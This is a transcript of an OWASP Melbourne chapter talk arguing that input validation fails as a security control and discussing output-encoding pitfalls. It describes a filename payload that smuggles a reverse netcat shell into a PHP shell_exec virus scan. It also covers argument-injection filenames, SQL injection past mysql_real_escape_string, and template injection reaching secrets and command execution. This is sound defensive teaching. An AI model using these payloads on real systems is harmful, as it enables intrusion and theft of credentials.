Hi everyone, thank you for joining OWASP chapters all day. And this time is for OWASP Melbourne chapter from Australia. And we pass on to Daniel Tang for introducing his chapter. And yeah, please enjoy. So just go ahead, Daniel. And we pass on to Daniel Tang for introducing his chapter.
Hi, good afternoon from Melbourne, Australia. Before we begin, I'd like to thank Takaharu from the Sendai chapter and the organizing team for putting together this awesome global event and giving us the opportunity to be part of this. I'm Daniel, the current chapter lead, transitioning over from Julian, which has been our chapter lead for the past few years. We do meetups when we can, focusing on quality over quantity. We also run one of Australia's largest annual AppSec-focused conference, the AppSec Day conference. An AppSec conference targeting and focusing on developers first. We had the privilege of sharing that experience with about 1,000 attendees last year, but unfortunately, due to the current global situation, it's very unlikely to actually happen this year. Follow us on our Twitter for updates on the chapter and details on other related local meetups or events happening. DMs are open if you'd like to reach us. We publish our meetups and events on meetup.com. And you can find our past AppSec Day conference talks on our YouTube channel. As always, all that we do is community driven, and we can only do what we do with your help. Reach out to us on Twitter if you'd like to speak or want to help out with the chapter. If you'd like to support this chapter and what the OWASP Foundation does, consider signing up for a membership at owasp.org/membership. But enough about this chapter. You'll hear for our speaker. Eldar is a lead security researcher and penetration tester working for Seek Australia. He's a long-time bug hunter with a large number of published advisories, exploits, and conference presentations at leading security conferences all over the world. He was a recipient of the first CV10K candidate numbers. In addition to finding vulnerabilities, he contributes to and maintains several open source projects in his spare time aimed at web application security and penetration testing. This include Grodit, Duna, LBMap, .pon, Nikto, and more. His tools and research are featured in most security-oriented Linux distributions, as well as many industry-leading books. We'd like to thank Eldar for sharing the lessons he's learned on input validation and output encoding fallacies. Let's welcome him. Eldar, over to you.
Thanks, Daniel. So I'm here today to talk about input validation and output encoding fallacies. I have opinions, rather strong opinions about some of these, and I'd like to share with you some of my thought process and also some of the things that I see as rather problematic when dealing with these particular recommendations. So pretty simple agenda, a little bit of background, talk about input validation, output encoding, draw a conclusion, and if there's time, take any questions. So basically what Daniel already said, this is me. I'm a pen tester, I do training, I do research, I present, do security. But we're here today to talk about security challenges when dealing with uncontrolled data. And so there's two recommendations that have been in the security industry for a long time, which is input validation and output encoding as ways of dealing with uncontrolled data. The reason why we have to deal with uncontrolled data is because it can impact execution and logic of an application in unexpected ways. So a while back, I put this up on my Twitter, and basically I asked, cross-site scripting is caused by what? Is it lack of input validation, lack of output encoding, both? I'd like you to take a moment to think of which one you think is applicable. And then when I readdress this in the conclusion, have a think as to whether or not have I changed your opinion or not? And hopefully you either picked what I think or I've made you reconsider. So before I start, some of this might seem a little on the point, and that's sort of the idea. We shouldn't just accept security advice as standard, right? We've seen this in things like password rotation, password complexity. It's good to take some time to reflect and see whether or not the advice we are giving is still relevant. So we'll start talking about input validation, which is known also as data validation. And the idea is just to prevent improperly formed data from entering an information system. And I expect that the definition of this really goes to the integrity of the data, not strictly a security aspect of the data. We have CWE20 for improper input validation, and that says that not validating input will lead to problems such as buffer overflows, cross-site scripting, null byte injection, Sql injection, uncontrolled format strings, as some of the examples of problems that occur when we don't validate input. And I'm of the opinion that input validation should not be a security function, ever, right? It's antiquated thinking. I don't think we're quite there yet. I'd really like to see it being a case. That doesn't mean that you should stop doing input validation. Input validation is really great for user experience, but input validation as a security function is not very great. The OWASP secure coding recommendation has 3 main points for input validation. Right? Identify all data sources and classify them as trusted and untrusted. Now that can be pretty hard, and a lot of times developers fall down because they think things are trusted when they're actually untrusted. For example, HTTP headers, HTTP host names, and so forth. And of course, once you're talking about second order, third order of data, then it becomes really hard because user data gets entered, it's stored in the database, gets stored in a session file. You're now at third point, but suddenly it means you can't trust your session values, right? So it is incredibly hard to actually do this correctly. Validate all data from untrusted sources, such as database file streams, etc. And again, validation means not just, the idea of validating data actually has to have some context around it, right? Also, they say that there should be a centralized input validation routing for the application, which is a point I quite strongly disagree with. If you are going to use input validation, because of context, it shouldn't be centralized. And like I said, this is rather old advice, right? It tends to date back to the days when we had CGI scripts, at least for web. So you have a 2 or 3 tiered infrastructure. You have central processing of input and output. The CGI script takes the input and provides the output. The internet still is largely English speaking, but particularly older days, it was even more predominantly English speaking. Whereas the modern infrastructure, you're talking multi-applications, mobile, web, API endpoints, integration with webhooks, or you can't necessarily determine every point that the data is coming from. You need to be UTF-8 or Unicode friendly, right? Emoji is a good thing, I think. So it's a lot of microservice infrastructure. It's not just browser speaks to CGI script speaks to database. It's a lot more complex and difficult. So even the notion of having a central input validation point, it doesn't scale to modern infrastructure. A great example is looking at email addresses. The actual type of characters that are allowed in a valid email address is a lot of different ones, particularly if you're supporting the text email address format. And then the output of this email goes into emails, probably returned in a HTML page. It gets stored in an SQL database or integrates with LDAP for authentication. ends up being stored on the file system, such as cache of HTML pages or the session, integrates with APIs, REST APIs, XML, right? Again, single input filtering for a routine for an email address would have to safeguard against all of the different contexts. And then because of the different special characters or syntactical meaning under the different contexts, suddenly your input validation for email address would start blocking valid email addresses. So it's, again, it's very easy to say validate input, but it's actually significantly harder to do it correctly. Again, is this a safe function? It could be. If 100% of the functions calling, or 100% of the code calling these functions correctly eliminates any potential bad characters, then it would be safe. But if you look at just the function in itself, you would say, well, this contains cross-site scripting. The variable or parameter hello name, the name parameter is not encoded for safety within HTML. And so now you're in this predicament that you're depending on input validation, so 100% of the inputs have to be correct. And as your code goes through changes, you might have found a place where it was missing, you add input validation, now you don't know if all the information that's stored in the database was already safe. If you have some bad characters in the database, then this function is no longer safe. So this is a perfect example of where output encoding the variable in the narrow scope of this specific function solves a problem that you would potentially use input validation for. So one of the replies that I got for the poll that I mentioned earlier was that people who think that input validation is a security feature are probably the same people who validate that Irish people have fake last names. You know, the apostrophe is a known problem. Yeah, I've spoken to Irish people who say that even on Irish websites, they trigger Sql injection by entering their last name. And you would think that maybe Irish websites would have a better expectation of apostrophes being contained in last names. But apostrophes is not the only problematic character in last names, right? This is Bile, I probably butchered that, but clicks, which is Xhosa, Zulu, potentially other languages, is another example of where you might expect characters that are difficult to handle to be part of valid input. Now, they are actually all Unicode characters, but you could imagine that if you're on a keyboard that doesn't support these Unicode characters, or then they might reasonably be presented by a normal exclamation mark or normal pipe character, which, if used in a command context, would have some significant impact. But again, it sort of just goes to show that you can't just say, well, input validation is enough, right? If you're rejecting Unicode strings, or you're rejecting, for example, exclamation marks as a African or South African business, that might be very hard, but we are now a global situation, right? People order from Amazon from every country, so you can't really say that this is a local problem. As a Norwegian, we have 3 extra consonants, vowels. Sorry, we have 3 extra vowels. And again, we find a lot of times that you can't enter your first name the way it should be in a website, because they don't support those characters. And I imagine it's the same for people that have other sigils, like Asian names, kanji, Chinese. So it would be nice if the internet was more Unicode friendly, and we had, reliable ways of handling this. But I think the one with the exclamation mark and pipe characters is particularly of interest for people that deal with security, at least. So data validation is hard. And in fact, even when you're trying to do data validation and you're following sort of best practice, you might end up in a situation where you didn't think you were going to be. So let's look at one example. This is the CERT secure coding guides for Java for dealing with sanitation of user supplied input when executing a command. And basically their recommendation is to do a pattern matching. And again, depending on the operating system, etc., there may be significant other characters allowed in a directory name or a file name than what's being provided here. And I do like that they say that he's their compliant solution. However, this compliant solution may in fact not be compliant at all. So good caveat. So I did this. I put this in an online check and see whether or not we are able to do something with this. The good news is there's no command injection because you can't use any of the syntactical characters. I am a little curious about the use of the @ symbol in file or directory name, but that's fine. However, just because something matches a valid file name doesn't mean that it can't have bad effects, right? So if you can ls up a directory or cat the content of, say, HT password, or read web.config, web XML, there's a lot of valid file names that have specific meaning. There's also the potential problem of using the DOS file names con, prn, lpt, which can have been known to cause denial of service in older versions of Windows and .NET Framework, etc. So it's not as simple as just excluding a bunch of characters. Something that's a valid file name there are still special files. So input validation for commands are very hard. What about SQL injection? All right, PHP type juggling. This is an old favorite of mine, where you're verifying that the value is actually 1, 2, 3, and then executing this, right? The truth is that because you're using the double equal operator in PHP, the supplied ID at the time of comparison with an integer of 1, 2, 3 gets cast to an integer. So it will actually match on a numeric case because the conversion of the string to an integer will only take the numbers. And then during the query, you're concatenating a string to a string, and it will actually execute the whole thing. So another example of where you might be trying to do input validation and still end up with a vulnerability. This is straight up SQL injection, even though you're quote unquote checking for a static value. And that sort of draws to conclusion on input encoding. Sorry, input validation. Let's talk about output encoding. Now, the recommendations for secure coding for output validation is a bit more prescriptive. So that things like context matters, certainly in this one, whereas it didn't so much on input validation. Encode all characters, sanitize all output of untrusted data to an operating system. That one is particularly difficult to do correctly or actually do at all in a safe manner. Utilize a standard tested routine for each type of outbound encoding. Yeah, that's all fine. I should actually mention, I probably should have mentioned that in previous, the OWASP secure coding recommendation, it's like a short PDF, couple of pages that I got this from. It's actually from 2010. So it's kind of expected that some of the advice in there is a little dated. It really could do with a rework. So if someone is sitting here and they would like to participate in some OWASP activity, maybe go look at the secure coding recommendations and see if you can bring it up to a modern standard. Right. The thing that I like about output encoding is that if you correctly handle data at the time of use, it eliminates a lot of the problems that input validation is supposed to solve. For example, buffer overflow, you can correctly handle that by using length limited operations, as long as you calculate the length correctly, right? Cross-site scripting, HTML entities, that obviously only applies for HTML output, but as long as it's contextually encoded for Java or JavaScript or sort of CSS or HTML, as long as the encoding is correct, it doesn't really matter what the value are, and input validation isn't adding any significant benefit there. Null byte injection, that one is mostly dealt with in terms of modern frameworks are all UTF-8 enabled. Of course, the problem happens when you call back out to something that's like C-based that has null terminated strings, but null byte injection is really a dying bug class. Sql injection, parameterized queries, uncontrolled format string. Well, all right, that one is different. I would argue, in fact, that uncontrolled format string is not input validation or output encoding problem at all. It's simply calling the function incorrectly, but it's up for debate. Still, input validation or output encoding is take that one offline if anyone has strong opinions and want to debate me on it. I'll hang around in the Slack for a bit after. All right. But of course, the big thing with both input validation and output encoding is that syntax matter, right? Or the context matter. Most of the time, the problem is that we are taking data from one context and using it in another. Right. We have a couple of things that always are problematic historically, like multi-byte characters. There's non-bypasses for double encoding or dangling slashes. So while you're doing output encoding, yeah, you can still run into a fair number of problems. I also have slight beef with templates, in that when you're assigning a template to a placeholder or a value to template placeholder, you don't necessarily know whether or not that value is being used within HTML or JavaScript, or is it a tag attribute, is it a tag value, is it just straight up context. So I would like templating languages or frameworks to improve things like this and be some of them are context aware anyway. Right, so let's look at some examples where output encoding can fail you. Right. So PHP Sql Output Encoding has had a colorful history, right? In the early days, people used to just recommend add slashes. That doesn't sufficiently protect you. MySQL escape string was introduced. MySQL real escape string and escape string is essentially the same function. But the MySQL escape string is deprecated. MySQL real escape string is often used to prevent SQL injection. If you look at the PHP help page for MySQL real escape string, it says some very important things, like if this function is not used to escape data, the query is vulnerable to SQL injection attacks. So if you don't use this, you have a problem. And this function must always, with a few exceptions, be used to make the data safe before sending a query to MySQL. So let's try that statement. We have here a bit of PHP code. It checks if an ID is set. If that ID is set, it will then MySQL real escape it and then use it in a query. And unfortunately, that does not safeguard us against SQL injection, despite what it says on the web page. The problem with this is, as I show here, is there's no quotes placed around it, which means that we can just keep on running. As long as the query doesn't contain any special characters that are encoded by this function, as we see here, null byte, new line, character return, backslash, apostrophe, double quote, and x1a. As we can see here, there is no quotes around it, so we don't have to break out of any quotes. And as long as we don't use any of the special characters, we have Sql Injection. We can't use strings because we can't use quote, but that's okay. MySQL supports hex-based values as strings. So this we do where ID equals 1, union select a string of A's. If there are quotes around this, then it is safe. Another example of MySQL Real Escape not doing a sufficiently good job is where it's being used on a column value. And I've seen this in the wild as well several times. Rather than sort of having logic to determine which columns to select from the table, it just takes a user supplied value, escapes it, and then select that column from the accounts where ID equals 1, 2, 3 in this case. And again, SQL injection, similar problem. We can't use strings. We have to use OX encoded values, but we can escape out of this because of the backtick. Now, backtick is a common way to quote server-side things like columns in SQL, but MySQL Real Escape does not escape backticks, which to me seems, very questionable. But this is what the function does. So, so if you were trying to do something like this, you would need to parameterize the query instead. All right. So that's some examples of where output encoding SQL doesn't keep you safe. What about command injection? Here we have a bit of code that does virus scans on uploaded files. It's probably because somebody wrote in a pen test report that they were able to upload iCar and the web server didn't crack it. That is another security recommendation that I often take beef with, but I'm not going to discuss that now. However, the result out of this is, unfortunately, that somebody added virus scanning to the web application and did it incorrectly. So now, instead of having the ability to store an ACAR virus scanning file, a virus file on the web server file system, we have remote code execution because it's being concatenated into a command and then passed to shell exec. So exploitation of this, the attacker would upload a file called cv semicolon netcat -e sh, it should really be bin sh, IP address echo.x, which when passed through shell exec results in 3 individual commands: the clam scan, the reverse netcat shell, and the echo.x. Right. How do you keep this from happening? Because if you have to run a shell-based utility to inspect a file, there's a couple of functions, right? So PHP has escape functions for the command line, 2 different ones, in fact, escape shell command and escape shell argument. And they have quite different functions. The first one ensures that only one command can be run, but you can have unlimited number of parameters and no different commands can be executed. Whereas escape shell arg ensures that only one parameter to the command is allowed, and you can't execute a different command. Now, these 2 seem very nice and easy to use. However, it is not that simple, right? So if we imagine that we fix this by saying we're going to add a base name around the file name, we're going to escape that and run it to avoid command injection, problem should be solved, right? Well, not quite. So historically, PHP escape shell command and arg has had problems with unsafe character sets, multi-wide bytes, like I said in the past. Vulnerable to heap-based stuff or overflow, which is probably one of my favorite problems with this function. You just provide long strings and you get code execution. That's great. But I think the biggest 2 gotchas with this is they're unsafe if used together. And if you read the help, it sort of looks like, well, escape shell command will keep the command safe, and escape shell arg will keep the argument safe. But if you use them together, they cancel each other out, and it becomes unsafe. So that's a big problem, and we do see that in the wild quite a bit, where people don't understand this. The other one is it does not prevent argument injection. So you can provide one argument such as -exec ID to find, and it will execute the ID command. And of course, I raised this with the PHP developers many years ago, and their argument was, well, we can't fix that. I agree, they can't really fix that, but they didn't want to update the help the documentation to say be aware of this, which I believe they still haven't done. So point of difference there, I guess. So now if we look at our fix, we had escape shell arg and base name. So the first problem is base name on its own is not sufficient, because you can have dangerous characters as file names, such as a semicolon id semicolon b.jpg, right? That's a valid file name. And of course, escape shell argument does not prevent argument injection. So if the attacker were to upload a file name called --log/tmp what.docx, then the virus scan in this case wouldn't do anything, because it would not receive a file to scan. It would basically create a log file saying I didn't scan anything and exit. So how do you properly fix this? You can use a fixed file name so that the file always has the same file name. You could use a server-generated file name known to be safe, so like a UUID. That's probably the one out of these three I would say is recommended. You can also pipe it to stand it in the case of clam scan. But if you're using a different virus engine, antivirus engine, that might not work. But rather than all of these, you should consider using, for example, like an S3 bucket that you place that has write permissions, no read, delete. That's your in bucket. And then you have an out bucket where people can only read and delete from and not write to. And just have it like as a cloud lambda to scan the files as to get put in, right? There's plenty of ways of doing it, but supplying the file name, user supplied file name to the command is not safe. Right. Template injection, looking at some modern problems. Here's an example also from the wild, the menu page. And this one was really interesting because it also ticks one of the other boxes. But essentially, it had a hello first name as like the top part of the menu, logout link, not much there. And then you go and you edit your user details. As you do, you add some values, first name, last name, email, and they appear in HTML without any sort of template. Click on the menu and it says hello 777, which means that server side it has evaluated the expression of 666 plus 111, hello 777. And that means we've identified like a second order template injection here. Yeah, and then you validate that this is exploitable by adding $class, param header, request scope, application scope. And you can typically get to the point of code execution. WAFs make this a little harder, but you can always usually steal secrets like environment variables and potentially get AWS tokens, etc. The bad news with this is that most templating languages do not have established methods to allow unsafe characters and template values, and there is no way to sort of say this, that this is user supplied input that contains template language. Don't treat it as templating. I'll go back and maybe explain this a little bit better. So we look at this here, the second line, SPI message code hello, that's a defined message string that takes an argument, which is a template language for first name, $ first name. And what happens here is when I set the first name to another template language here, like $666 plus 1111, it recurses through when it's assigning the message code hello with the argument first name. It recurses through the string until it's resolved all the template values. So that's how the user data gets into the template, and that's how the expression gets evaluated to in 777. And yeah, there's in the template or in there's not a flag to say don't recurse this. So for input validation, there's no options for like parameterizing or template escape. I've looked at a few different frameworks. I have not seen one that's good. If you know of one, please let me know. I'd like to be able to give good recommendations when I find this. So if there is a safer than other templating framework, please let me know, because I'd like to know. And that's really it. Gone through this pretty quickly. In conclusion, you might wonder, why didn't I talk about SQL parameterization? That I did mention it a little bit. The thing with SQL parameterization, why this is so excellent at keeping things safe without any output encoding, without any input validation, it's because it's a two-process interaction. So first, it parses the SQL, which we have here in the prepared statement, right, with two placeholders. It will parse this into a tree. It will do its optimization, etc. That's all done. And then once this is all parsed, then it will deal with the user values. And so at no point during the parsing can the supplied values affect the interpretation of the statement. All right, here we go. This is the parsing. No user supplied values. Nothing can modify the intent of the SQL statement at this point. Here we handle the user values. And at that point, the parsing has happened. So again, the user values cannot affect the parameterized query. The bad news is that SQL parameterization is a feature in SQL servers, right? And we don't have similar interfaces for things like LDAP queries, XML, file system, command line, and obviously baking this sort of stuff into, well, baking into LDAP isn't necessarily hard. Baking it into file system or command line execution would probably be very difficult. I'd love to see safer ways of handling data as sort of a two-step process, right? If you have a programming language that only offer parameterized queries and not like the MySQL query outright, chances are developers will write safer code. So that's really all in terms of the points I had to make. If we look at the Twitter poll results, found that 18% voted for lack of input validation, 33% voted for lack of output encoding, and 49% voted for both, which means that the input validation only crowd is actually pretty small. I would say that in most cases, it should really, well, for cross-site scripting, 100% lack of output encoding. However, in other contexts, both might be needed, or you can't discount lack of input validation. So yeah, the problem is input validation is still seen as a viable defensive solution. And as long as we keep saying, oh, just do input validation, chances are that we will not be seeing developers write better data handling solutions, right? Correctly encoding data, I'd say, is more valuable than input encoding. But if the interface isn't written into the solution, then it's not there. If you're writing an interface such as a templating language, could you bake context awareness into it and correctly safeguard data without relying on the developer doing it correctly at 100% of the points of input? Yeah, I think that would be really great. I would really love to live in a post input validation world. And that's really it. That's it for me for slides. I guess we can see if there's any questions.
Hi, I believe Vijay had a question. Hi, using template injection, what are the vulnerability can be achieved, myself achieved, XSS in it? Other than this, what else?
So yeah, so in the slides that I shared, you can see that I was able to dump like the class names, etc. That's a small information value. It really depends on the template and the host language. So I was dealing with Java in this example. If you drop the application scope which is a predefined variable, it will dump the entire config file for the web server. And quite often you'll be able to find, credentials or AWS tokens or something set in the configuration. Also, again, if you're not dealing with the WAF, you can generally just do cast to Java class and then do Java reflection back into system runtime exec and just run commands. So the impact of template injection, again, contextual, but you should ideally be able to leverage it into code execution. So, yeah.
Thank you.
All right.
Was there any other questions? I think there is like a 10 to 15 second delay from the time we say anything here to the time it shows up on YouTube. So we'll give it a bit more time. Thanks for that presentation and a quick overview of the very, very slippery slope fallacies of injection.
I should add, if it wasn't clear already, I'm WireGhoul on most social media. I'll be hanging around or checking in on Slack throughout the day. If you have any questions, I'm happy to argue with you on Twitter or on Slack. So feel free to hit me up, even though the stream is finished.
Awesome. I guess we'll have a Twitter storm soon. There is no other questions from the audience. Thank you so much for the presentation and educating us. Back to Takaharu then.
Okay, yeah, thank you very much for great talk, Elda and Daniel. It's really enjoyed it. So thank you very much, everyone, for joining Melbourne chapter and joining this OWASP chapter all day. And we only done 16 hours and 8 hours to go. So we move on to Bangalore, India in 15 minutes. So stay tuned and come back here. So yes. So thank you very much. So bye.
Awesome. I guess that's it. We're offline. Are we? No. No, we're still